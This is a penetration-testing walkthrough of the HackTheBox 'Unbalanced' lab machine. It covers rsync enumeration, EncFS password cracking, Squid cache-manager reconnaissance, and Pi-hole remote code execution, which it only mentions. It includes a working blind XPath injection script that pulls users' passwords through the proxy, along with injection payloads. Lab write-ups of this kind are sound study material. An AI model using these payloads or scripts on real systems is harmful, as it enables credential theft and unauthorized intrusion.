This article looks at how professional penetration testers and attackers find and exploit vulnerabilities in systems. Using the Unbalanced machine from the HackTheBox platform, it walks through the attack chain step by step so that the reader understands how each technique works and how to defend against it.
This machine has an IP address of 10.10.10.200, which I add to /etc/hosts.
10.10.10.200 unbalanced.htb
First, open ports are scanned. This is done with a small script that takes one argument, the address of the host being analysed. It runs a fast full-range discovery scan first and then a service/version scan (-A) only against the ports found open:
#!/bin/bash
# Usage: ./scan.sh <host>
# Pass 1: all 65535 TCP ports, fast; keep only the "<port>/tcp" lines and join the port numbers with commas.
ports=$(nmap -p- --min-rate=500 "$1" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
# Pass 2: detailed scan of just those ports.
nmap -p"$ports" -A "$1"
The scan found SSH (22), rsync (873) and a Squid proxy (3128). Rsync is a program for UNIX-like systems that synchronises files and directories between two locations with minimal bandwidth usage. It can list the contents of a remote directory and copy files, with compression and recursion options.
The rsync daemon on this host lists its exported modules to anyone who asks:
rsync --list-only rsync://unbalanced.htb:873
Copy the conf_backups module locally:
rsync -av rsync://unbalanced.htb:873/conf_backups conf_backups
A .encfs6.xml file among the backups indicates an EncFS encrypted volume. That file holds the volume's key-derivation parameters (salt, iteration count, key size) and the master key encrypted under the password-derived key, so the next step is to turn it into a crackable password hash.
The hash is then run through a wordlist attack.
This yields the password used to encrypt the volume. All that remains is to mount it with encfs.
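The hash in the previous step is built from the fields of .encfs6.xml. The following is an added example (not code from the original write-up) that parses such a file and emits the parameters in the $encfs$ format john understands, which is the same layout encfs2john.py produces: key size, KDF iterations, cipher id (0 for ssl/aes, 1 for ssl/blowfish), salt length, salt, encrypted-key length, encrypted key. The XML below is a constructed sample with arbitrary key material and is not the file from the machine; the label "conf_backups" is an assumption.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed key material for the sample config (arbitrary bytes, not the real volume's).
_SALT = bytes(range(0x10, 0x24))          # 20 bytes, matches <saltLen>
_ENCODED_KEY = bytes(range(44))           # 44 bytes, matches <encodedKeySize>

# Constructed .encfs6.xml in the layout EncFS writes (a boost serialization archive).
SAMPLE_ENCFS6_XML = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<!DOCTYPE boost_serialization>
<boost_serialization signature="serialization::archive" version="7">
<cfg class_id="0" tracking_level="0" version="20">
  <version>20100713</version>
  <creator>EncFS 1.9.5</creator>
  <cipherAlg class_id="1" tracking_level="0" version="0">
    <name>ssl/aes</name>
    <major>3</major>
    <minor>0</minor>
  </cipherAlg>
  <nameAlg>
    <name>nameio/block</name>
    <major>4</major>
    <minor>0</minor>
  </nameAlg>
  <keySize>192</keySize>
  <blockSize>1024</blockSize>
  <encodedKeySize>{len(_ENCODED_KEY)}</encodedKeySize>
  <encodedKeyData>
{base64.b64encode(_ENCODED_KEY).decode()}
  </encodedKeyData>
  <saltLen>{len(_SALT)}</saltLen>
  <saltData>
{base64.b64encode(_SALT).decode()}
  </saltData>
  <kdfIterations>181474</kdfIterations>
  <desiredKDFDuration>500</desiredKDFDuration>
</cfg>
</boost_serialization>
"""


def parse_encfs6(xml_text):
    """Extract the KDF parameters and the encrypted volume key from .encfs6.xml text."""
    cfg = ET.fromstring(xml_text).find('cfg')

    def text(path):
        return cfg.find(path).text.strip()

    salt = base64.b64decode(text('saltData'))
    encoded_key = base64.b64decode(text('encodedKeyData'))
    # The declared lengths must match the decoded data; otherwise the file is damaged or truncated.
    if len(salt) != int(text('saltLen')) or len(encoded_key) != int(text('encodedKeySize')):
        raise ValueError('saltLen/encodedKeySize do not match the decoded data')
    return {
        'cipher': text('cipherAlg/name'),
        'key_size': int(text('keySize')),
        'kdf_iterations': int(text('kdfIterations')),
        'salt': salt,
        'encoded_key': encoded_key,
    }


def john_hash(info, label='conf_backups'):
    """Format the parameters as john's $encfs$ hash (the layout encfs2john.py emits).

    'label' is just the username column of the hash line; "conf_backups" is an assumed name.
    """
    cipher_id = {'ssl/aes': 0, 'ssl/blowfish': 1}[info['cipher']]
    return '%s:$encfs$%d*%d*%d*%d*%s*%d*%s' % (
        label, info['key_size'], info['kdf_iterations'], cipher_id,
        len(info['salt']), info['salt'].hex(),
        len(info['encoded_key']), info['encoded_key'].hex())


if __name__ == '__main__':
    print(john_hash(parse_encfs6(SAMPLE_ENCFS6_XML)))
```

The cracker has to repeat EncFS's own key schedule for every candidate: PBKDF2-HMAC-SHA1 over the password with the salt and kdfIterations, then decrypting encodedKeyData and checking its checksum. The iteration count therefore sets the cost per guess, which is why a large kdfIterations (EncFS tunes it to roughly desiredKDFDuration milliseconds) matters far more than the key size. Once the password is known, the volume is mounted with encfs <encrypted dir> <mount point>.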
After mounting, the decrypted directory shows a normal list of files.
These are mostly configuration files, and the one of most interest is squid.conf. Let's look at the lines that are not comments (uniq collapses the runs of blank lines that removing the comments leaves behind):
grep -v '^#' squid.conf | uniq
The cache manager password found there (the cachemgr_passwd directive) is noted for later, and the new domain name that the configuration references is added to /etc/hosts. The ACL entries are then examined for further targets.
10.10.10.200 intranet.unbalanced.htb
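Reading a Squid configuration for targets means answering two questions: which destinations do the http_access rules let a client reach through the proxy, and which cache manager reports does a cachemgr_passwd line unlock. Below is an added example (not from the original write-up) that parses those three directives from a constructed squid.conf excerpt; the ACL names, networks and allowed actions in the sample are hypothetical, only the cache manager password is the one used later on this page.

```python
# Constructed squid.conf excerpt in Squid's directive syntax (hypothetical ACLs and
# actions, not the machine's real file; the cachemgr password is the one used on the page).
SAMPLE_SQUID_CONF = """\
# Recommended minimum configuration:
acl localnet src 10.0.0.0/8
acl intranet dstdomain intranet.unbalanced.htb
acl intranet_net dst 172.31.179.0/24
acl SSL_ports port 443

http_access allow intranet
http_access allow intranet_net
http_access deny all

cachemgr_passwd Thah$Sh1 menu fqdncache
cachemgr_passwd disable all
http_port 3128
"""


def parse_squid_conf(text):
    """Return (acls, http_access rules, cachemgr_passwd entries) from squid.conf text."""
    acls, rules, cachemgr = {}, [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):      # same filter as grep -v '^#'
            continue
        parts = line.split()
        if parts[0] == 'acl' and len(parts) >= 4:
            # acl <name> <type> <value...>; one name may be declared on several lines
            acls.setdefault(parts[1], []).append((parts[2], parts[3:]))
        elif parts[0] == 'http_access' and len(parts) >= 3:
            # http_access allow|deny <acl> [<acl>...]; a leading '!' negates an ACL
            rules.append((parts[1], parts[2:]))
        elif parts[0] == 'cachemgr_passwd' and len(parts) >= 3:
            # cachemgr_passwd <password> <action...>; 'disable' and 'none' are keywords
            cachemgr.append((parts[1], parts[2:]))
    return acls, rules, cachemgr


def allowed_destinations(acls, rules):
    """Destination values (dst / dstdomain ACLs) that an 'http_access allow' rule admits."""
    targets = set()
    for action, names in rules:
        if action != 'allow':
            continue
        for name in names:
            if name.startswith('!'):               # negated ACL: not a target
                continue
            for acl_type, values in acls.get(name, []):
                if acl_type in ('dst', 'dstdomain'):
                    targets.update(values)
    return targets


def cachemgr_passwords(cachemgr):
    """Map each real cache manager password to the actions it unlocks."""
    return {pw: actions for pw, actions in cachemgr if pw not in ('disable', 'none')}


if __name__ == '__main__':
    acls, rules, cachemgr = parse_squid_conf(SAMPLE_SQUID_CONF)
    print('reachable through the proxy:', sorted(allowed_destinations(acls, rules)))
    print('cache manager access:', cachemgr_passwords(cachemgr))
```

The defensive reading is the mirror image: a cachemgr_passwd line that is not "disable" or "none" is a plaintext credential that grants every listed report to anyone who can reach the proxy port, and every dst/dstdomain ACL that an allow rule references is a pivot into a network the proxy can see but the client cannot.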
Let's configure the proxy in the browser and open the web server under the newly found domain name.
An authorization form appears. After some time spent analysing it, the decision is to go back to Squid itself for further reconnaissance.
Let's see which cache manager reports are available, authenticating with the password from squid.conf (-w):
squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:menu | grep -v 'disabled'
The fqdncache report, Squid's cache of resolved host names, reveals more domain names:
squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
There are three more names. Add them to /etc/hosts (the last one is not listed directly and is inferred from the numbering of the other two).
172.31.179.2 intranet-host2.unbalanced.htb
172.31.179.3 intranet-host3.unbalanced.htb
172.31.179.1 intranet.unbalanced.htb
The landing page of this site states that it is a temporary solution.
Next, we reach the same kind of authorization form.
Testing it with the payload ' or ''=' in the password field produces a different response: the input is clearly being concatenated into a query.
The response to that injection contains a list of users, which tells us the query is XPath. With crafted predicates, the password of each user can then be recovered blind, one character at a time.
First, the password length is determined with the XPath string-length() function. For calibration, a login whose password is known to be 5 characters long is used: the condition is checked for lengths 4 and 5, and the two responses are compared.
The difference is clear. Once the length is known, the password is extracted one character at a time with substring(). Again calibrating with the test login, the first character is compared with a, then with b.
The difference is again clear. The next step is a script that automates the process for every login.
import requests
import string

url = 'http://172.31.179.1/intranet.php'
proxies = {'http': 'http://10.10.10.200:3128'}   # reach the intranet host through the Squid proxy
users = ['bryan', 'sarah', 'jim', 'rita']

# Injected into the Password field. The leading quote closes the application's own
# string literal; the application's trailing quote closes the value we append.
pass_str_len = "' or Username='USER' and string-length(Password)='"
pass_str_chr = "' or Username='USER' and substring(Password,NUM,1)='"

for user in users:
    # Step 1: find the password length by testing string-length(Password) = 1..24
    for l in range(1, 25):
        data = {'Username': '', 'Password': pass_str_len.replace('USER', user) + str(l)}
        request = requests.post(url=url, data=data, proxies=proxies)
        print('(' + str(l) + ') ' + user + ' : ' + ' ' * 10, end="\r")
        if 'Invalid credentials.' not in request.text:
            # Step 2: recover each position with substring(Password, NUM, 1) = c.
            # string.printable[:94] is digits, letters and punctuation (it includes the
            # quote character, which can never match because it breaks the injected query).
            passwd = ''
            for num in range(l):
                for c in string.printable[:94]:
                    data = {'Username': '',
                            'Password': pass_str_chr.replace('USER', user).replace('NUM', str(num + 1)) + c}
                    request = requests.post(url=url, data=data, proxies=proxies)
                    print('(' + str(l) + ') ' + user + ' : ' + passwd + c + ' ' * 10, end='\r')
                    if 'Invalid credentials.' not in request.text:
                        passwd += c
                        break
            print(user + " : " + passwd + " " * 10)
            break
One of the recovered passwords gives SSH access to the machine.
In the user's home directory there is a TODO list.
It shows that the tasks related to Pi-hole (web password: admin) have been completed. netstat is not installed on the host, so the listening ports cannot be viewed the usual way; the kernel's own socket table under /proc/net can be read instead with a short script.
Ports 8080 and 5553 are listening.
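Without netstat or ss, /proc/net/tcp (and /proc/net/tcp6) is the source of truth for listening sockets; the only work is decoding its hex columns. The following is an added example (not the script from the original write-up) that parses that table and prints every socket in LISTEN state. The rows below are constructed for the example, with ports 8080 and 5553 on the loopback address, and are not the machine's real table.

```python
import socket
import struct

TCP_LISTEN = '0A'   # value of the 'st' column for sockets in LISTEN state

# Constructed /proc/net/tcp rows (hypothetical; not the machine's real table).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0100007F:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 23456 1 0000000000000000 100 0 0 10 0
   2: 0100007F:15B1 00000000:0000 0A 00000000:00000000 00:00000000 00000000   999        0 34567 1 0000000000000000 100 0 0 10 0
   3: C80A0A0A:0016 2A0A0A0A:D4A2 01 00000000:00000000 02:000A1234 00000000     0        0 45678 2 0000000000000000 20 4 30 10 -1
"""


def decode_addr(hex_addr):
    """'0100007F:1F90' -> ('127.0.0.1', 8080).

    The kernel prints the address as native-endian 32-bit words (little-endian on x86),
    so the bytes come out reversed; IPv6 entries in /proc/net/tcp6 use four such words.
    """
    ip_hex, port_hex = hex_addr.split(':')
    if len(ip_hex) == 8:
        ip = socket.inet_ntoa(struct.pack('<I', int(ip_hex, 16)))
    else:
        words = [int(ip_hex[i:i + 8], 16) for i in range(0, 32, 8)]
        ip = socket.inet_ntop(socket.AF_INET6, struct.pack('<4I', *words))
    return ip, int(port_hex, 16)


def listening_sockets(table_text):
    """Parse /proc/net/tcp text; return (ip, port, uid) for every LISTEN socket, sorted by port."""
    found = []
    for line in table_text.splitlines()[1:]:          # first line is the header
        fields = line.split()
        # columns: sl local_address rem_address st tx:rx tr:when retrnsmt uid timeout inode ...
        if len(fields) < 8 or fields[3] != TCP_LISTEN:
            continue
        ip, port = decode_addr(fields[1])
        found.append((ip, port, int(fields[7])))
    return sorted(found, key=lambda entry: entry[1])


if __name__ == '__main__':
    try:
        with open('/proc/net/tcp') as f:
            text = f.read()
    except OSError:                                   # not on Linux: fall back to the sample
        text = SAMPLE_PROC_NET_TCP
    for ip, port, uid in listening_sockets(text):
        print(f'{ip}:{port}\tuid={uid}')
```

A socket bound to 127.0.0.1 only, as in the sample, is exactly the kind of service that does not show up in the external port scan but becomes reachable once you have a shell, which is why the next step is an SSH port forward rather than a direct connection. The uid column tells you which account owns the listener, a useful hint about what privileges an exploit against it would yield.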
The response from that port reveals another domain name and its IP address. Port 8080 is then forwarded over SSH to the attacking machine (replace <user> with the account whose password was recovered), and the service is opened in the browser.
ssh -L 8080:127.0.0.1:8080 <user>@unbalanced.htb
Open the page and log in to Pi-hole with the password admin.
The Pi-hole version in use has a known authenticated remote code execution exploit; let's look at it.
Start a listener, then run the exploit to obtain a shell on the host.
Inspecting a script on the host reveals a password.
This article has covered the techniques used against this HackTheBox machine: enumerating an open rsync daemon, cracking an EncFS password, abusing Squid's cache manager to discover internal hosts, blind XPath injection and RCE in Pi-hole. Along the way we obtained a list of users, SSH access, a further internal domain and a script containing a password. Each step underlines the importance of keeping systems updated and not leaving credentials and encrypted backups where anonymous services can hand them out.